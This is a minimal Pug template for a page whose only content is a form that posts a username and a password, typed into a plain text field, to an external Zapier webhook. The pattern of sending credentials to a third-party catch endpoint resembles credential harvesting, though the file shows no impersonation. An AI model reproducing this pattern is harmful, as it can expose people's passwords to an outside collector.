doctype html
html
  head
  body
    form(action='https://hooks.zapier.com/hooks/catch/2931424/z6cita/', method='POST')
      input(type='text', name='username', placeholder='Enter text')
      input(type='text', name='password', placeholder='Password')
      input(type='submit', value='Submit')